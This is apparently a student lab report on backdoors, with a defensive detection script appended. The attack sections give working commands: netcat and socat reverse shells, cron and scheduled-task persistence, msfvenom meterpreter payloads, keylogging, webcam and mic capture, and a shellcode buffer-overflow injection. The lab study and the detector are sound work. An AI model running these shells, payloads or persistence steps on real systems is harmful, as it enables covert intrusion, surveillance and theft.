Table of Contents
- 1. Backdoor concept
- 2. Common backdoors
- 3. Starting the backdoor
- 3.1 netcat obtains the host's shell, started from cron
- 3.2 socat obtains the host's shell, started from a scheduled task
- 3.3 MSF meterpreter (or other software) generates an executable file, which is transferred to the host with ncat or socat and run there to obtain the host's shell
- 3.4 MSF meterpreter (or other software) obtains audio, camera images, keystroke logs, etc. from the target host, and attempts privilege escalation
- 3.5 Optional extra: inject the shellcode generated by MSF into pwn1 from experiment 1 and obtain a reverse-connection shell
- 4. Thoughts and takeaways
- 5. Questions answered
1. Backdoor concept
- A backdoor is a way into a system that bypasses its normal authentication process and access channels.
2. Common backdoors
2.1 NC or netcat
- Also known as nc or ncat
- http://nc110.sourceforge.net/
- http://netcat.sourceforge.net/
2.1.1 Windows obtains a Linux shell
On Windows, use
ipconfig
to view the local IP.
Use the ncat.exe program
ncat.exe -l -p 5322
to open a listener, and check the connectivity between Windows and Linux.
On Kali, connect back to Windows with
ncat 192.168.132.1 5322 -e /bin/sh
, where the -e
option runs the shell program on the connection.
Having obtained a Linux shell on Windows, any command can be run, such as
ls
2.1.2 Linux obtains a Windows shell
On Kali, install net-tools; after that the
ifconfig
command can be used to view the IP.
Open a listener:
nc -l -p 5322
On Windows, connect back to Kali with
ncat.exe -e cmd.exe 192.168.132.138 5322
Kali now has a Windows command prompt.
2.1.3 Mac obtains a Windows shell
2.1.4 Windows obtains a Mac shell
2.1.5 Mac obtains a Linux shell
2.1.6 Linux obtains a Mac shell
2.1.7 Netcat: further knowledge
Transmitting data with nc
- On Windows, listen on port 5322:
ncat.exe -l 5322
- On Kali, connect to port 5322 on Windows:
nc 192.168.132.1 5322
- Once the connection is established, the two sides can send data to each other.
Transferring files with nc (a file is sent from Kali to Windows)
- On Windows, listen on port 5322 and save the received data to file1.out: ncat.exe -l 5322 > file1.out
- On Kali, connect to port 5322 on Windows and send the file: nc 192.168.132.1 5322 < file1.in
- Once the connection is established, Windows receives the file sent by Kali.
2.2 Meterpreter
- Meterpreter is a backdoor program.
- The traditional view is: someone writes a backdoor, and we make use of it.
- Later, some experts wanted to write a platform that generates backdoors. Such a platform makes the backdoor's
  - basic functions (basic connectivity, executing instructions),
  - extensions (such as collecting user information, installing services and other functions),
  - encoding mode,
  - operating platform,
  - and operating parameters
  partly or fully adjustable. By combining them as needed, an executable file can be generated.
- Typical platforms include:
  - intersect
  - Metasploit's msfvenom command
  - Veil-Evasion
- Parameter description (msfvenom)
  - -p: the payload to use. "Payload" is the thing being delivered; here windows/meterpreter/reverse_tcp is a piece of shellcode.
  - -x: the executable file to use as a template; the payload (shellcode) is written into this executable.
  - -e: the encoder to use, which transforms the shellcode in order to evade antivirus detection.
  - -i: the number of encoder iterations, i.e. encode 5 times with the encoder above.
  - -b: bad characters to be removed from the payload.
  - LHOST: the IP the reverse connection goes back to.
  - LPORT: the port the reverse connection goes back to.
  - -f: the type of file to generate.
  - >: the file the output is redirected to.
3. Starting the backdoor
3.1 netcat obtains the host's shell, started from cron
crontab -e
adds a timed task; -e
means edit. Because this is the first edit, a prompt asks which editor to use; here option 3 is chosen.
On the last line add 58 * * * * /bin/netcat 192.168.132.1 5322 -e /bin/sh, which means: at the 58th minute of every hour, make a reverse connection to port 5322 on the Windows host.
At minute 58 Linux connects to Windows; this is a reverse-connection backdoor, so a shell is obtained after Windows starts listening for the connection.
3.2 socat obtains the host's shell, started from a scheduled task
- Right-click
"My Computer"
, click "Manage".
Click
"Task Scheduler"
, then click "Create Task".
Fill in the task name and create a new trigger.
Create a new action and, under program or script, select the
socat.exe
path; in the "Add arguments" field fill in tcp-listen:5322 exec:cmd.exe,pty,stderr
After creation the task is displayed as "Ready".
When 21:25 arrives, or when the machine is powered on again, the created task can be found running.
A cmd window pops up on its own.
On Kali, enter the command
socat - tcp:192.168.132.1:5322
to complete the connection and obtain a Windows shell.
3.3 MSF meterpreter (or other software) generates an executable file, which is transferred to the host with ncat or socat and run there to obtain the host's shell
On Linux, use
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.132.138 LPORT=5322 -f exe > backdoor5322.exe
to generate the backdoor.
On Windows, use
ncat.exe -lv 5322 > backdoor5322.exe
and check the connection status.
On Linux, use
nc 192.168.132.1 5322 < backdoor5322.exe
to transmit the backdoor; after a successful transfer Windows shows a prompt.
The file is transmitted and received successfully.
- On Linux, use
msfconsole
to enter the msf console and type the following commands:
Use the listener module and set the payload: use exploit/multi/handler
Use the same payload as when the backdoor was generated: set payload windows/meterpreter/reverse_tcp
The IP address of Linux: set LHOST 192.168.132.138
Use the same port: set LPORT 5322
View the settings: show options
After entering the msf console interface:
After entering the commands, the interface:
On Linux, use
exploit
to start listening, then run the backdoor on Windows; Linux successfully obtains the Windows shell.
3.4 MSF meterpreter (or other software) obtains audio, camera images, keystroke logs, etc. from the target host, and attempts privilege escalation
Use the
record_mic
command to capture a segment of audio.
Use the
webcam_snap
command to take a picture with the camera.
Use the
keyscan_start
command to record keystrokes, and the keyscan_dump
command to read the recorded keystrokes.
Use the
screenshot
command to take a screenshot.
Use the
getuid
command to view the current user, and the getsystem
command to attempt privilege escalation.
3.5 Optional extra: inject the shellcode generated by MSF into pwn1 from experiment 1 and obtain a reverse-connection shell
- In the Exploit Database, search for
linux/x86 - Reverse
shellcode, download it, and extract the machine code for the reverse connection:
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80
On Linux, use
echo "0" > /proc/sys/kernel/randomize_va_space
to turn off address space randomization.
- Use the following command, with output redirection >, to store the string produced by
perl
in the file input_shellcode:
perl -e 'print "A"x 32;print"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
Open a terminal and use
(cat input_shellcode;cat) | ./pwn1
to inject the attack into this buffer. Then open another terminal and use ps -ef | grep pwn1
to find the pwn1
process ID; start gdb
and use attach
to attach the debugger, use disassemble foo
to view the address of ret
, set a breakpoint there, press Enter in the first terminal, and then in gdb
enter c
to continue running.
Use
info r esp
to locate the stack pointer and view the data stored at that address.
The address stored there is 0xffffd38c
, so the shellcode address is calculated as 0xffffd38c+4
, that is 0xffffd390
- Open the msf console in one terminal and start listening.
In another terminal, modify
input_shellcode
accordingly and use (cat input_shellcode;cat) | ./pwn1
to run the pwn1
file.
A shell then starts running in the other terminal.
4. Thoughts and takeaways
- The experiment is relatively simple, but rather time-consuming. The operating steps before the bonus item could be learned in advance, and there was not much difficulty throughout the experiment. Through this experiment, I understood the basic principles of backdoors, gained hands-on experience, felt the dangers of backdoors, and I hope to learn more in the future learning process.
5. Questions answered
- (1) What possible ways can you think of for a backdoor to enter your system?
- Downloading applications from unofficial websites: these programs may be bundled with certain executable files, leaving a backdoor. After clicking a link on a phishing site, an executable file may be downloaded to your computer, leaving a backdoor.
- (2) What ways do you know, with examples, for a backdoor to be started (Windows and Linux)?
- Linux: started by a crontab timer; injected shellcode.
- Windows: a new scheduled task; modifying a registry key so the backdoor starts at boot; the user running a file that carries the backdoor.
- (3) Which Meterpreter function left the deepest impression on you?
- By controlling the backdoor shell on the controlled host, it can obtain audio, camera images, keystroke logs and more from the target host.
- (4) How can you find out whether a backdoor has been installed on your own system?
- Use security software to scan the system on a schedule and remove malicious files.
- Use Task Manager and other system tools to check the background for abnormal programs.
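A check in the spirit of answer (4), looking in the places where sections 3.1 and 3.2 plant the backdoor: an added Python example that is not part of the original report. It runs over constructed crontab, scheduled-task and process lines (not captured from a real host) and flags the two behaviours every shell in this lab depends on: a netcat-family binary given -e, and socat bridging a socket to an exec: address.

```python
import re

# Constructed sample inputs (not captured from a real host): a crontab, two
# scheduled-task actions and two process command lines, each holding one entry
# modelled on the commands in sections 2.1, 3.1 and 3.2 above.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
58 * * * * /bin/netcat 192.168.132.1 5322 -e /bin/sh
"""
SAMPLE_TASK_ACTIONS = [
    r"C:\Program Files\Backup\backup.exe --nightly",
    r"C:\Tools\socat.exe tcp-listen:5322 exec:cmd.exe,pty,stderr",
]
SAMPLE_PROCESSES = [
    "root 1203 /usr/sbin/sshd -D",
    "user 2210 ncat.exe -e cmd.exe 192.168.132.138 5322",
]

# Each rule is (regex, reason): nc/ncat/netcat given -e (run a program on the
# connection), and socat with an exec: address (program bridged to a socket).
RULES = [
    (re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-e\s", re.I),
     "netcat -e: a program is attached to a network connection"),
    (re.compile(r"\bsocat(\.exe)?\b.*\bexec:", re.I),
     "socat exec: a program is attached to a network connection"),
]

def parse_crontab(text):
    """Return (schedule, command) pairs, skipping comments and blank lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) == 6:
            entries.append((" ".join(fields[:5]), fields[5]))
    return entries

def scan(source, lines):
    """Return (source, line, reason) for every line that matches a rule."""
    return [(source, line, reason) for line in lines
            for pattern, reason in RULES if pattern.search(line)]

def audit(crontab_text, task_actions, processes):
    """Scan crontab commands, scheduled-task actions and process lines."""
    cron_cmds = [cmd for _, cmd in parse_crontab(crontab_text)]
    return scan("crontab", cron_cmds) + scan("task", task_actions) + scan("process", processes)
```

On the constructed samples, audit(SAMPLE_CRONTAB, SAMPLE_TASK_ACTIONS, SAMPLE_PROCESSES) returns exactly the three planted entries, one per source, and leaves the benign apt-get, backup and sshd lines alone.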